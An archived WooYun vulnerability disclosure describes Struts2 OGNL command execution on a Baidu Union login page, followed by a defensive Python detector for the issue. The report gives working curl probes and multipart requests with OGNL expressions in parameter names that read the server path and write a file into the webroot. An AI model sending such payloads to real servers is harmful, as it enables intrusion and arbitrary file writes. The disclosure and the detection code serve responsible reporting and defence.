WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2015-10-17: Details sent to the vendor, awaiting the vendor's handling
2015-10-17: Vendor confirmed; details disclosed to the vendor only
2015-10-27: Details disclosed to core white hats and relevant domain experts
2015-11-06: Details disclosed to regular white hats
2015-11-16: Details disclosed to intern white hats
2015-12-01: Details disclosed to the public
Struts2 command execution turns up on Baidu...
Baidu Union http://union.baidu.com/userlogin.action
http://union.baidu.com/userlogin.action?redirect:/xxoo
Returns a blank page.
curl http://union.baidu.com/userlogin.action -d "redirect:/xxoo=1"
curl -i http://union.baidu.com/userlogin.action -F "redirect:/xxoo=-1"

HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 0
Date: Fri, 16 Oct 2015 14:53:13 GMT
Location: http://union.baidu.com/xxoo;jsessionid=6A2E51000AE93C7F2126AC067338B598.worker1
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6A2E51000AE93C7F2126AC067338B598.worker1; Path=/
X-Prism-Spanid: 0
X-Prism-Uid: 20151016_93E12A56-F41F-4228-934B-C310562131A2
Content-Type: text/plain; charset=utf-8
It 302-redirected... Is the multipart form not checked at all? It turns out the double quotes inside the parameter name need no special handling whatsoever; it looks a bit like a greedy regex match. Is this a property of the Java web container?
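A defender's check for the point made above, added here as an example that is not part of the original report: it inspects parameter names in the query string, in a urlencoded body and in multipart/form-data field names, and flags the Struts 2 action-mapper prefixes (the report shows `redirect:`) and embedded OGNL markers. The multipart name regex is deliberately greedy, so a field name that itself contains double quotes is seen whole, matching the container behaviour the author observed; a parser that stopped at the first quote would truncate the name and miss the expression. The host, boundary and request bodies below are constructed placeholders, not captured traffic.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qsl, urlsplit

# Struts 2 action-mapper prefixes that vulnerable versions evaluated as OGNL
# when they appeared in a parameter NAME (the report shows "redirect:").
STRUTS_PREFIXES = ("redirect:", "redirectAction:", "action:", "method:")
# Substrings that mark an embedded OGNL expression inside such a name.
OGNL_MARKERS = ("${", "%{", "#context", "#_memberAccess", "@java.", "new java.")

# Greedy on purpose: capture up to the LAST quote on the line, so a name that
# contains double quotes is not cut short (the behaviour observed above).
NAME_RE = re.compile(r'name="(.*)"')

Finding = Tuple[str, str, str]  # (location, parameter name, reason)


def classify_name(name: str) -> Optional[str]:
    """Explain why a parameter name looks like a Struts prefix injection, or None."""
    lowered = name.lower()
    for prefix in STRUTS_PREFIXES:
        if lowered.startswith(prefix.lower()):
            if any(marker in name for marker in OGNL_MARKERS):
                return f"{prefix} prefix with OGNL expression"
            return f"{prefix} prefix in parameter name"
    return None


def parse_request(raw: str):
    """Split a raw HTTP request into (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, target, headers, body


def multipart_field_names(content_type: str, body: str) -> List[str]:
    """Return the form-data field names of a multipart/form-data body."""
    match = re.search(r"boundary=([^;]+)", content_type)
    if not match:
        return []
    delimiter = "--" + match.group(1).strip().strip('"')
    names = []
    for part in body.split(delimiter):
        part_headers = part.split("\r\n\r\n", 1)[0]  # headers of this part only
        for line in part_headers.split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                found = NAME_RE.search(line)
                if found:
                    names.append(found.group(1))
    return names


def find_struts_prefix_injection(raw_request: str) -> List[Finding]:
    """Check query-string, urlencoded and multipart parameter NAMES of one request."""
    _method, target, headers, body = parse_request(raw_request)
    findings: List[Finding] = []
    # keep_blank_values=True keeps a name with no "=" (e.g. ?redirect:/xxoo).
    for name, _ in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        reason = classify_name(name)
        if reason:
            findings.append(("query", name, reason))
    content_type = headers.get("content-type", "")
    if content_type.startswith("multipart/form-data"):
        location, body_names = "multipart", multipart_field_names(content_type, body)
    elif content_type.startswith("application/x-www-form-urlencoded"):
        location = "form"
        body_names = [n for n, _ in parse_qsl(body, keep_blank_values=True)]
    else:
        location, body_names = "body", []
    for name in body_names:
        reason = classify_name(name)
        if reason:
            findings.append((location, name, reason))
    return findings


# Constructed sample requests modelled on the shapes shown in the report
# (placeholder host and boundary; not captured traffic).
SAMPLE_GET = "GET /userlogin.action?redirect:/xxoo HTTP/1.1\r\nHost: union.example.test\r\n\r\n"
BOUNDARY = "------------------------4a606c052a893987"  # curl-style, constructed
SAMPLE_MULTIPART = (
    "POST /userlogin.action HTTP/1.1\r\nHost: union.example.test\r\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\r\n\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="redirect:/${"a"+"b"}"\r\n\r\n'  # quotes inside the name
    "1\r\n"
    f"--{BOUNDARY}--\r\n"
)
SAMPLE_BENIGN = (
    "POST /userlogin.action HTTP/1.1\r\nHost: union.example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "username=alice&password=hunter2&redirect=/home"
)

if __name__ == "__main__":
    for label, req in (("GET", SAMPLE_GET), ("multipart", SAMPLE_MULTIPART), ("benign", SAMPLE_BENIGN)):
        print(label, find_struts_prefix_injection(req))
```

A filter that only looks at the query string and urlencoded bodies would report the first request and miss the second, which is the gap the report exploits; the plain `redirect=/home` field in the benign request is not flagged because the prefix needs the colon. Inspection like this is a detection aid only: the fix for the prefix handling itself is upgrading to a Struts 2 release that no longer evaluates these prefixes as OGNL.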
Getting the web application's path:
POST http://union.baidu.com/userlogin.action HTTP/1.1
User-Agent: curl/7.33.0
Host: union.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 236
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987

--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"

-1
--------------------------4a606c052a893987--
Testing writing a shell:
POST http://union.baidu.com/userlogin.action HTTP/1.1
User-Agent: curl/7.33.0
Host: union.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 232
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987

--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:/${"x"+(new java.io.PrintWriter("/home/work/union/htdocs/wooyun.jpg")).append("wooyun").close()}"

1
--------------------------4a606c052a893987--
http://union.baidu.com/wooyun.jpg
...
Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-10-17 01:04
Thanks for the submission; the fix has been assigned.
None yet